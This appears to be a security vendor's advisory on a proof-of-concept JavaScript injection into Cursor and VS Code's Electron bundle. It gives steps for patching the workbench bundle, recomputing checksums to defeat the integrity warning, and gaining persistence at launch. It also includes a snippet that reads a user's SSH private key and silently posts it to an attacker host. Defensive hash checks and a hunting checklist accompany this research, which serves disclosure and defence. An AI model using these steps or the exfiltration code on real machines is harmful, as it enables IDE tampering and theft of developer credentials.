
A JavaScript injection attack on Cursor, facilitated by a malicious extension, can take over the IDE and the developer workstation. While the PoC we’re releasing may be unique, we’ve seen this class of attack many times this past year alone. Our purpose is to take a deep dive into these attacks through the PoC, understand why they continue to work, and suggest defensive approaches.

Every week, the attack surface against agents, and specifically AI coding assistants, expands. At the same time, threat actor interest is at an all-time high, and attacks are becoming more prevalent. New adversarial research is released every single day.

We must stop and understand these attacks better if we’re to make a dent. Especially in cyber defense and AppSec, the industry doesn’t yet have capabilities in this realm, aside from our product at Knostic (wink wink).

We attempted to strike a balance between thoroughness and brevity, and we hope keeping the text concise was the right choice.

Knostic protects your developers and AI coding agents against attacks like this. To learn more, visit https://www.getkirin.com/ 

To Start: These Agents Are Node.js Interpreters

The underlying attack class, JavaScript execution in Electron/Node context, is not new. Similar injection and extension-abuse techniques have been used in browsers for years. What is new is how quickly and easily adversaries can weaponize those same weaknesses today, thanks to the way AI coding assistants operate.

We show that malicious JavaScript running inside the Node.js interpreter, whether introduced by an extension, an MCP server, or a poisoned prompt or rule, immediately inherits the IDE’s privileges: full file-system access, the ability to modify or replace IDE functions (including installed extensions), and the ability to persist code that reattaches after a restart. Once interpreter-level execution is available, an attacker can turn the IDE into a malware distribution and exfiltration platform.

From a security program management perspective, AI coding assistants also increase the range of supply chain threats organizations must tackle. Traditional IDEs largely relied on vetted extensions, whereas today developers pull MCP servers, extensions, and even simple prompts and rules from unvetted online sources.

Each of these components introduces third-party risks that can disrupt CI/CD pipelines and extend the organizational perimeter to the developer’s workstation. As a result, Cursor, Windsurf, and other VS Code derivatives now sit firmly within modern supply chain risk management considerations. Operationally, they also serve as lateral movement paths between developer workstations, repositories, production systems, vaults, and the corporate network.

Insecure Architecture, Expanded Attack Surface, and an Old Class of Vulnerabilities

Architecturally, Cursor runs on VS Code, which is an Electron app powered by Node.js. There are no effective isolation controls between Node.js and the rest of the system. Therefore, interpreter-level execution can directly call the file system and native APIs. Via Cursor, an attacker can inject JavaScript into the running IDE and alter UI and extension state with trivial user interaction. 

For Electron apps, this vulnerability class is well known. What has changed is that many coding agents are now effectively browsers, introducing these classic vulnerabilities into our CI/CD process.

Moreover, AI coding agents and in-IDE language agents run code and evaluate prompts inside that Node.js context, which significantly increases the number of entry points an attacker can use.

We demonstrate the issue via a crafted malicious extension. However, the same technique also applies to MCP servers and malicious prompts and rules.

What it means

A single malicious extension or otherwise injected script can: 

  • Gain full file-system access

  • Modify or replace installed extensions 

  • Persist code that reattaches after restarts

Because many IDEs are Electron forks of VS Code, exploit patterns carry across multiple assistants and forks. Compromised developer accounts or automated publishing pipelines can accelerate the spread and turn IDEs into malware distribution platforms.

Demonstrating Code Injection

We implement a proof-of-concept malicious extension that does two things in parallel: it injects JavaScript into the running IDE to execute actions, and it manipulates the UI to present a controlled list of extensions. This dual approach shows both the execution capability and the visible, persistent effects an attacker can produce.

For a clear, low-risk demonstration, we inject a harmless UI badge labeled MALICIOUS. The badge is rendered by calling into VS Code’s extension host and updating the DOM via the Electron/Node context. The same minimal code path used to render the badge also permits enumerating and altering installed extensions, writing files, and persisting changes that survive restarts. The demo uses Cursor, but the technique applies to any VS Code/Electron fork.
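To make the DOM-level effect concrete, here is a minimal sketch of the badge injection as it could be reproduced from the IDE’s Electron context. The selectors (.extension-list-item, .name) and the malicious-badge class are assumptions for illustration; real class names vary between builds, and the actual PoC patches the minified bundle instead, as shown in the walkthrough below.

// Sketch of the badge's DOM effect (selectors assumed; the real PoC
// patches renderTemplate in the minified workbench bundle instead).
for (const row of document.querySelectorAll('.extension-list-item')) {
  const name = row.querySelector('.name');
  if (!name || row.querySelector('.malicious-badge')) continue; // skip duplicates
  const badge = document.createElement('span');
  badge.className = 'malicious-badge';
  badge.textContent = 'MALICIOUS';
  badge.style.cssText = 'margin-left:6px;padding:0 4px;background:#c00;color:#fff;border-radius:3px;';
  name.after(badge);
}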

Screenshot 1: The original, unmodified version of VS Code

Screenshot 2: The malicious badge we added by injecting code into VS Code.

Technical Walkthrough: Bundle Injection 

Perform these steps only on an isolated test machine. Please note this is for controlled security research purposes only.

Overview

  1. Create a VM or test environment (to prevent code corruption, never use your production machine)

  2. Install a fresh copy of Cursor/VS Code

  3. Create a full backup:

cp -R /Applications/Cursor.app /tmp/cursor_backup

  4. Follow the injection steps below in a controlled environment

  5. Document changes and verify detection mechanisms

  6. Destroy the test environment when complete

Step 1: Locate the Bundle Files

On macOS (similar paths exist for Windows/Linux):

/Applications/Cursor.app/Contents/Resources/app/out/vs/workbench/

The key files are:

  • workbench.desktop.main.js (minified JavaScript)

  • workbench.desktop.main.css (minified CSS)

Step 2: Find the Injection Point

The files are minified, so you need to identify the correct location by mapping what you see in the running UI to the original VS Code source.

  1. Inspect the running interface: In Cursor or VS Code, open Help → Toggle Developer Tools → Elements. Right-click the area you want to modify and select Inspect.

    Note the CSS selector (for example, .extension-bookmark-container, .name, or .badge).

  2. Map the CSS selector to the source code: Because the minified version is difficult to read, clone the VS Code repository and search for that selector name to find where it is defined or referenced. Focus on the functions renderTemplate and renderElement, which control how list or tree items are drawn. This helps locate the part of the code that generates the DOM element you inspected.

  3. When the selector isn’t obvious: If you cannot find the selector in the minified bundle, place breadcrumbs (temporary markers) in the upstream VS Code codebase. This allows you to trace which section of the source creates the target element.

  4. Understand the render functions: If needed, search the VS Code repository to study how renderTemplate and renderElement interact and where CSS selectors are applied. These functions define the template structure and then render the actual elements you see in the UI.

In this example, we injected a badge into the extensions list:

// Located after span.name in the renderTemplate function
A = Ve(f, We("span.malicious-badge"))

Note that these are minified function names, shortened to save space. They change between builds and may differ from what you see in your version. This is why you should always refer to the original VS Code source code rather than relying only on the minified bundle.

See screenshots in step 3 below.

Step 3: Understand the Rendering Functions

VS Code uses two critical functions:

  • renderTemplate: Returns a JSON structure defining UI elements
  • renderElement: Uses the template to actually render the UI

You must:

  1. Add your element to renderTemplate
  2. Include it in the return statement JSON
  3. Reference it in renderElement for actual rendering
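For orientation, here is a de-minified sketch of the pattern with simplified names. This is not the exact VS Code source; in the shipped bundle these appear as minified identifiers such as Ve and We from the snippet above.

// renderTemplate builds each row's DOM skeleton and returns handles;
// renderElement later fills those handles in for every list item.
class ExtensionRendererSketch {
  renderTemplate(container) {
    const name = document.createElement('span');
    name.className = 'name';
    container.appendChild(name);

    // Injected: the extra element, added to both the template and its return value.
    const badge = document.createElement('span');
    badge.className = 'malicious-badge';
    container.appendChild(badge);

    return { name, badge };
  }

  renderElement(extension, index, template) {
    template.name.textContent = extension.displayName;
    template.badge.textContent = 'MALICIOUS'; // injected: render the badge
  }
}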

Screenshot 3: Original VS Code interface before injection 

Screenshot 4: UI after badge injection (demonstration)

Step 4: Bypass Integrity Checks

After modification, VS Code displays a warning: "Installation is corrupt, please reinstall."

To bypass this, recalculate the checksum:

# Calculate the new hash
openssl dgst -sha256 -binary \
  /Applications/Cursor.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js \
| base64 | tr -d '='

# Update product.json:
# replace the value under "checksums.vs/workbench/workbench.desktop.main.js"

Location: /Applications/Cursor.app/Contents/Resources/app/product.json
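If you want to script this step, here is a minimal Node.js sketch, assuming product.json keeps its checksums map keyed as shown above. For isolated test environments only.

// Recompute the bundle checksum the way VS Code expects (SHA-256,
// base64-encoded, '=' padding stripped) and write it into product.json.
const crypto = require('crypto');
const fs = require('fs');

const base = '/Applications/Cursor.app/Contents/Resources/app';
const rel = 'vs/workbench/workbench.desktop.main.js';

const digest = crypto.createHash('sha256')
  .update(fs.readFileSync(`${base}/out/${rel}`))
  .digest('base64')
  .replace(/=+$/, '');

const productPath = `${base}/product.json`;
const product = JSON.parse(fs.readFileSync(productPath, 'utf8'));
product.checksums[rel] = digest; // key observed in the step above
fs.writeFileSync(productPath, JSON.stringify(product, null, '\t'));
console.log(`Updated checksum for ${rel}`);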

Step 5: Execution

Restart the application. Your injected code now executes automatically at every launch with full system access, before any security checks run.

Accessing the File System

VS Code exposes a fileService API internally, which handles file access for extensions and internal features. A direct require('fs') doesn't work in Electron's renderer process, but fileService provides the same reach:

// Find locations where the constructor has fileService=* (* = any letter due to minification)

// Example: Exfiltrating SSH keys
fileService.readFile({ path: '/Users/username/.ssh/id_rsa', scheme: 'file' })
  .then(f => {
    // Exfiltrate sensitive data
    fetch('https://attacker.com/exfil', {
      method: 'POST',
      body: f.value.toString()
    });
  })
  .catch(e => {
    // Fail silently
  });

The fileService object is available throughout the codebase. Examine the VS Code repository or search the bundle for "fileService." to find the available methods.
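You can also enumerate what a captured reference offers at runtime; the fileService variable name below is illustrative, since the actual reference is minified in the bundle.

// List the methods exposed by a captured fileService reference.
const proto = Object.getPrototypeOf(fileService);
const methods = Object.getOwnPropertyNames(proto)
  .filter(name => typeof fileService[name] === 'function');
console.log(methods); // expect entries such as readFile, writeFile, del, ...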

Impact

The supply chain threats facing organizations have expanded as IDEs like VS Code operate with full system privileges, act as fully-fledged browsers that can inadvertently infect themselves, and are actively targeted by attackers.

MCP servers, compromised extensions, prompts, rules, or even simple mistakes can inject malicious code, which runs as a privileged payload. This, in turn, enables attackers to access the file system and alter the IDE.

The same Cursor exposure discussed in this advisory also affects other VS Code AI forks such as Windsurf, which share the same Electron-based architecture.

Recommendations for Developers

  • Disable Auto-Run features in your IDE or extensions

  • Grant minimum necessary permissions to extensions and MCP servers

  • Validate all external dependencies before installation:

    • Check GitHub star count and activity

    • Confirm version matches the official repository

    • Match the repository owner with the verified publisher

    • Review open issues and recent PRs for anomalies

  • Verify bundle integrity:

# Calculate the current hash
openssl dgst -sha256 -binary \
  /Applications/Cursor.app/Contents/Resources/app/out/vs/workbench/workbench.desktop.main.js \
| base64 | tr -d '='

# Compare with the value in product.json
# Mismatch = potential compromise
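The same comparison can be scripted. A minimal Node.js sketch of the check, using the macOS path from this advisory and assuming the product.json checksums layout described in the walkthrough:

// Recompute the bundle hash and compare it against product.json.
// A mismatch means the bundle was modified after packaging.
const crypto = require('crypto');
const fs = require('fs');

const base = '/Applications/Cursor.app/Contents/Resources/app';
const rel = 'vs/workbench/workbench.desktop.main.js';

const computed = crypto.createHash('sha256')
  .update(fs.readFileSync(`${base}/out/${rel}`))
  .digest('base64')
  .replace(/=+$/, '');

const expected = JSON.parse(
  fs.readFileSync(`${base}/product.json`, 'utf8')
).checksums[rel];

console.log(computed === expected
  ? 'OK: bundle checksum matches product.json'
  : 'ALERT: checksum mismatch - potential compromise');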

Recommendations for Security Teams: Hunting Checklist

  1. Monitor bundle file modifications (a minimal monitoring sketch follows this list):

    • Monitor workbench.desktop.main.js and product.json.

    • Alert on unauthorized checksum or bundle edits.

  2. Audit extension installations:

    • Review installed extensions, publishers, and update history.

  3. Network and system monitoring:

    • Flag IDE traffic to unknown domains.

    • Watch for unauthorized writes in IDE directories.

  4. Credential scanning:

    • Scan for exposed tokens in IDE configs.

    • Track irregular credential access.
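For item 1 in the checklist above, a minimal Node.js monitoring sketch using the macOS paths from this advisory; a production deployment would forward events to your SIEM rather than log locally.

// Watch the workbench bundle and product.json for modifications.
const fs = require('fs');

const base = '/Applications/Cursor.app/Contents/Resources/app';
const targets = [
  `${base}/out/vs/workbench/workbench.desktop.main.js`,
  `${base}/product.json`,
];

for (const file of targets) {
  fs.watch(file, eventType => {
    console.log(`[${new Date().toISOString()}] ${eventType} on ${file}`);
  });
}
console.log('Watching IDE bundle files for unauthorized edits...');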

Real-Time Detection with Kirin

In the video below, see how Kirin by Knostic detects a malicious extension the moment it's installed. The user is alerted instantly and guided to remove it, stopping the threat before it spreads. 

Learn More

Knostic protects developers and AI coding agents against attacks like these.
Learn more: https://www.getkirin.com/
